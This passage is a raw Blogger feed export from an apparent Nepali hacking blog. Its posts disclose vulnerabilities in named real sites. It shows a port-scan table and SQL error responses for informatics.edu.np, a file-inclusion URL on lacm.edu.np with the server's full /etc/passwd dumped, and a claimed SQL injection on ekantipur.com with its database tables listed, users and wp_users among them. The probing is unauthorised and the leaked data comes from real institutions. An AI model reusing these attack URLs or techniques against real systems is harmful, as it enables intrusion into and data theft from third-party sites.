-moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Netbios-ssn&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;143&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Imap/CourierIMAPd   2006 released&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;443&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;445&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Microsoft-ds&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;465&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;993&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Imap/CourierIMAPd2008   released&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;995&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;5800&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Vnc-http&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;5900&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;x&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;vnc&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt; &lt;br /&gt;also more than that i think that it is vulnerable to the sqli attack&lt;br /&gt;&lt;br /&gt;url entered:  http://www.informatics.edu.np/about_us.php?inst=asdasdvasdv&lt;br /&gt;returned: ERROR: Unknown column 'asdasdvasdv' in 'where clause'&lt;br /&gt;&lt;br /&gt;url entered:http://www.informatics.edu.np/course_matter.php?mid=asdvasdv&lt;br /&gt;returned:   Unknown column 'asdvasdv' in 'where clause'&lt;br /&gt;&lt;br /&gt;also the college uses the webmail based in zimbra...you can look at milw0rm for the vuls of zimbra( i dont want to tell the which version it is....try this by your own)&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-165592978454406091?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/165592978454406091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/07/informatics-college-directory-browsing.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/165592978454406091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/165592978454406091'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/07/informatics-college-directory-browsing.html' title='Informatics college. Directory browsing enabled.'/><author><name>Danepali Hacker</name><uri>http://www.blogger.com/profile/12866747289101958230</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_oXLMHC4FG8I/TEMk3zmpDHI/AAAAAAAAAAM/4tn63jC4Kz8/s72-c/upload.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4769551208036509405</id><published>2010-04-25T19:11:00.000-07:00</published><updated>2010-04-25T19:11:33.667-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='local file inclusion'/><category scheme='http://www.blogger.com/atom/ns#' term='lacm.edu.np'/><category scheme='http://www.blogger.com/atom/ns#' term='lfi'/><title type='text'>LACM.EDU.NP [little angels college of management] File inclusion vulnerability</title><content type='html'>I was checking the site of Little Angels College of Management when they were here in KU for the sports week. &amp;amp; in a while, I found it to be vulnerable to file inclusion vulnerability.&lt;br /&gt;Vulnerable URL is:&lt;br /&gt;http://lacm.edu.np/?lacm=[any_file_to_include]&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;/etc/passwd&lt;/b&gt;:&lt;br /&gt;&lt;br /&gt;root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin shiva:x:500:500::/home/shiva:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash&lt;br /&gt;&lt;br /&gt;And I also got the sql Db.. what the hell they are keeping database backup in the website root folder itself.&lt;br /&gt;See you guys.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3339723251203762129-4769551208036509405?l=nepsecvulns.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/4769551208036509405/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/lacmedunp-little-angels-college-of.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4769551208036509405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default/4769551208036509405'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/2010/04/lacmedunp-little-angels-college-of.html' title='LACM.EDU.NP [little angels college of management] File inclusion vulnerability'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-4527398429941749495</id><published>2010-04-25T18:57:00.000-07:00</published><updated>2010-04-25T18:57:25.293-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sql injection'/><category scheme='http://www.blogger.com/atom/ns#' term='ekantipur.com'/><category scheme='http://www.blogger.com/atom/ns#' term='sqli'/><title type='text'>Ekantipur.com [Ekantipur -online news portal of Kantipur Daily] Vulnerability</title><content type='html'>Most of us know about Ekantipur.com, online news portal of kantipur daily newspaper. They recently came with new design and development &amp;amp; I was hoping to see securely coded website but I was still able to find some holes in the website. There is a SQL injection vuln in the site of kantipur daily which can be used to potentially dump the DB &amp;amp; then the admin panel can be compromised and possibly we can get shell in the site..&lt;br /&gt;I hope they will soon fix it.. &amp;amp; if they want to get the information of the vulnerability, I would be happy to help them.&lt;br /&gt;Database tables in the current DB:&lt;br /&gt;» daily_updates&lt;br /&gt;» ek_categories&lt;br /&gt;» ek_gallary_comments&lt;br /&gt;» ek_gallary_images&lt;br /&gt;» ek_gallery_image_rating&lt;br /&gt;» ek_news&lt;br /&gt;» ek_news_comments&lt;br /&gt;» ek_news_gallary&lt;br /&gt;» ek_news_gallary_details&lt;br /&gt;» ek_news_keywords&lt;br /&gt;» ek_news_keywords_list&lt;br /&gt;» ek_news_ratings&lt;br /&gt;» ek_news_reporter_list&lt;br /&gt;» ek_news_reporters&lt;br /&gt;» ek_photo_features&lt;br /&gt;» ek_photo_gallary&lt;br /&gt;» ek_sub_categories&lt;br /&gt;» ekn_categories&lt;br /&gt;» ekn_gallary_comments&lt;br /&gt;» ekn_gallary_images&lt;br /&gt;» ekn_gallery_image_rating&lt;br /&gt;» ekn_news&lt;br /&gt;» ekn_news_comments&lt;br /&gt;» ekn_news_gallary&lt;br /&gt;» ekn_news_gallary_details&lt;br /&gt;» ekn_news_keywords&lt;br /&gt;» ekn_news_keywords_list&lt;br /&gt;» ekn_news_ratings&lt;br /&gt;» ekn_news_reporter_list&lt;br /&gt;» ekn_news_reporters&lt;br /&gt;» ekn_photo_features&lt;br /&gt;» ekn_photo_gallary&lt;br /&gt;» ekn_photo_gallary_details&lt;br /&gt;» ekn_sub_categories&lt;br /&gt;» exchange_rates&lt;br /&gt;» horoscope&lt;br /&gt;» horoscope_reading&lt;br /&gt;» horroscope&lt;br /&gt;» kan_categories&lt;br /&gt;» kan_gallary_images&lt;br /&gt;» kan_main_photo&lt;br /&gt;» kan_news&lt;br /&gt;» kan_news_author_list&lt;br /&gt;» kan_news_comments&lt;br /&gt;» kan_news_gallary&lt;br /&gt;» kan_news_gallary_details&lt;br /&gt;» kan_news_keywords&lt;br /&gt;» kan_news_keywords_list&lt;br /&gt;» kan_news_ratings&lt;br /&gt;» kan_news_reporter_list&lt;br /&gt;» kan_news_reporters&lt;br /&gt;» kan_photo_features&lt;br /&gt;» kan_photo_gallary&lt;br /&gt;» kan_photo_gallary_details&lt;br /&gt;» kan_sub_categories&lt;br /&gt;» kq_categories&lt;br /&gt;» kq_gallary_images&lt;br /&gt;» kq_issue&lt;br /&gt;» kq_main_photo&lt;br /&gt;» kq_news&lt;br /&gt;» kq_news_author_list&lt;br /&gt;» kq_news_authors&lt;br /&gt;» kq_news_comments&lt;br /&gt;» kq_news_gallary&lt;br /&gt;» kq_news_gallary_details&lt;br /&gt;» kq_news_keywords&lt;br /&gt;» kq_news_keywords_list&lt;br /&gt;» kq_news_ratings&lt;br /&gt;» kq_photo_features&lt;br /&gt;» kq_photo_gallary&lt;br /&gt;» kq_photo_gallary_details&lt;br /&gt;» kq_sub_categories&lt;br /&gt;» login_records&lt;br /&gt;» models&lt;br /&gt;» models_gallery_images&lt;br /&gt;» nar_categories&lt;br /&gt;» nar_gallary_images&lt;br /&gt;» nar_issue&lt;br /&gt;» nar_news&lt;br /&gt;» nar_news_author_list&lt;br /&gt;» nar_news_authors&lt;br /&gt;» nar_news_comments&lt;br /&gt;» nar_news_gallary&lt;br /&gt;» nar_news_gallary_details&lt;br /&gt;» nar_news_keywords&lt;br /&gt;» nar_news_keywords_list&lt;br /&gt;» nar_news_ratings&lt;br /&gt;» nar_photo_features&lt;br /&gt;» nar_photo_gallary&lt;br /&gt;» nar_photo_gallary_details&lt;br /&gt;» nar_sub_categories&lt;br /&gt;» nep_categories&lt;br /&gt;» nep_gallary_images&lt;br /&gt;» nep_issue&lt;br /&gt;» nep_news&lt;br /&gt;» nep_news_author_list&lt;br /&gt;» nep_news_authors&lt;br /&gt;» nep_news_comments&lt;br /&gt;» nep_news_gallary&lt;br /&gt;» nep_news_gallary_details&lt;br /&gt;» nep_news_keywords&lt;br /&gt;» nep_news_keywords_list&lt;br /&gt;» nep_news_ratings&lt;br /&gt;» nep_photo_features&lt;br /&gt;» nep_photo_gallary&lt;br /&gt;» nep_sub_categories&lt;br /&gt;» nepa_year&lt;br /&gt;» nepse_chart&lt;br /&gt;» news_agency&lt;br /&gt;» news_keywords&lt;br /&gt;» news_status&lt;br /&gt;» news_types&lt;br /&gt;» papers&lt;br /&gt;» photo_gallary_details&lt;br /&gt;» poll_option&lt;br /&gt;» poll_ques&lt;br /&gt;» privilege&lt;br /&gt;» ratings&lt;br /&gt;» sap_blow_up&lt;br /&gt;» sap_categories&lt;br /&gt;» sap_gallary_images&lt;br /&gt;» sap_issue&lt;br /&gt;» sap_news&lt;br /&gt;» sap_news_author_list&lt;br /&gt;» sap_news_authors&lt;br /&gt;» sap_news_comments&lt;br /&gt;» sap_news_gallary&lt;br /&gt;» sap_news_gallary_details&lt;br /&gt;» sap_news_keywords&lt;br /&gt;» sap_news_keywords_list&lt;br /&gt;» sap_news_ratings&lt;br /&gt;» sap_photo_features&lt;br /&gt;» sap_photo_gallary&lt;br /&gt;» sap_photo_gallary_details&lt;br /&gt;» sap_sub_categories&lt;br /&gt;» stock_trading_companies&lt;br /&gt;» tithi&lt;br /&gt;» tkp_categories&lt;br /&gt;» tkp_gallary_images&lt;br /&gt;» tkp_main_photo&lt;br /&gt;» tkp_news&lt;br /&gt;» tkp_news_comments&lt;br /&gt;» tkp_news_gallary&lt;br /&gt;» tkp_news_gallary_details&lt;br /&gt;» tkp_news_keywords&lt;br /&gt;» tkp_news_keywords_list&lt;br /&gt;» tkp_news_ratings&lt;br /&gt;» tkp_news_reporter_list&lt;br /&gt;» tkp_news_reporters&lt;br /&gt;» tkp_photo_features&lt;br /&gt;» tkp_photo_gallary&lt;br /&gt;» tkp_photo_gallary_details&lt;br /&gt;» tkp_sub_categories&lt;br /&gt;» user_paper_privileges&lt;br /&gt;» user_type_privileges&lt;br /&gt;» user_types&lt;br /&gt;» users&lt;br /&gt;» video_categories&lt;br /&gt;» videos&lt;br /&gt;» weather_details&lt;br /&gt;» weather_place&lt;br /&gt;» wp_1_comments&lt;br /&gt;» wp_1_links&lt;br /&gt;» wp_1_options&lt;br /&gt;» wp_1_postmeta&lt;br /&gt;» wp_1_posts&lt;br /&gt;» wp_1_term_relationships&lt;br /&gt;» wp_1_term_taxonomy&lt;br /&gt;» wp_1_terms&lt;br /&gt;» wp_blog_versions&lt;br /&gt;» wp_blogs&lt;br /&gt;» wp_registration_log&lt;br /&gt;» wp_signups&lt;br /&gt;» wp_site&lt;br /&gt;» wp_sitecategories&lt;br /&gt;» wp_sitemeta&lt;br /&gt;» wp_usermeta&lt;br /&gt;» wp_users&lt;br 